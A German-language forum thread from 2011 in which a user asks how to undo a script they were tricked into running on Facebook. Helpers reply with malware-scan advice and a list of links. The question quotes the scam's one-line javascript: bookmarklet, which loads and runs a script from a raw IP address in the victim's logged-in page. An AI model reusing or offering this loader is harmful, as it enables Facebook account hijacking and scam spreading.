Java-Script facebook anwendung entfernen, aber wie ???

Diskutiere und helfe bei Java-Script facebook anwendung entfernen, aber wie ??? im Bereich Computerfragen im SysProfile Forum bei einer Lösung; Java-Script facebook anwendung entfernen, aber wie ??? so hallo erstmal ich habe seit heute ein problem und zwar habe ich bei facebook... Dieses Thema im Forum "Computerfragen" wurde erstellt von Fragr, 18. April 2011.

  1. Fragr
    Fragr Grünschnabel
    Registriert seit:
    6. Februar 2008
    Beiträge:
    0
    Zustimmungen:
    0

    Java-Script facebook anwendung entfernen, aber wie ???

    so hallo erstmal ich habe seit heute ein problem und zwar habe ich bei facebook versehentlich auf so eine anwendung geklickt wo ich ein script aktiviert habe bitte um hilfe wie ich das wegmachen kann danke

    hier der script: javascript:(a=(b=document).createElement('script')).src='//216.119.153.147/german2.php?'+Math.random(),b.body.appendChild(a);void(0)



    Danke im vorraus!
     
  2. Helfr
    Helfr Grünschnabel
    Registriert seit:
    22. April 2008
    Beiträge:
    0
    Zustimmungen:
    0

    Dein PC und Deine Daten sind gefährdet!

    System Analyse und Bereinigung
    Lade Malwarebytes Anti-Malware herunter.
    Starte einen vollständigen Scan mit Anleitung: Malwarebytes Anti-Malware und Anleitung: Emsisoft Anti-Malware danach befolge für eine Analyse und Bereinigung die notwendigen Schritte Logfiles von Analysetools...

    Mache alle Windows Dateien sichtbar (Anleitungen, FAQs & Links)

    Befolge folgende Anweisungen: an alle Hilfesuchenden

     
  3. Suchr
    Suchr Grünschnabel
    Registriert seit:
    29. März 2009
    Beiträge:
    0
    Zustimmungen:
    0

    Probleme bei der Benutzung von Facebook in Firefox ...
    http://support.mozilla.com/de/kb/Probleme%20bei%20der%20Benutzung%20von%20Facebook%20in%20Firefox

    Farmville Anwendung auf Facebook löschen
    http://www.computerfrage.net/tipp/farmville-anwendung-auf-facebook-loeschen

    Anwendungen bei Facebook löschen
    http://www.computerfrage.net/tipp/anwendungen-bei-facebook-loeschen

    JavaScript entfernen,aber wie? (Computer, java)
    http://www.gutefrage.net/frage/javascript-entfernenaber-wie

    Datum in Google SERPs entfernen | Facebook
    http://www.facebook.com/note.php?note_id=125667350811516&comments&ref=mf

    Facebook: Entfernen der Scrollbalken in einer iFrame Anwendung ...
    http://blog.pas-solutions.ch/webdesign/facebook-entfernen-der-scrollbalken-in-einer-iframe-anwendung/

    Staticfloat - PHP, Javascript, Facebook ... Tutorials
    http://staticfloat.com/

    FBML-Tutorial für eigene Reiter auf Facebook-Fanseiten « In Sachen ...
    http://deblog.schwindt-pr.com/2010/02/06/fbml-tutorial-fuer-eigene-reiter-facebook-fanseiten/
     
Thema:

Java-Script facebook anwendung entfernen, aber wie ???

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden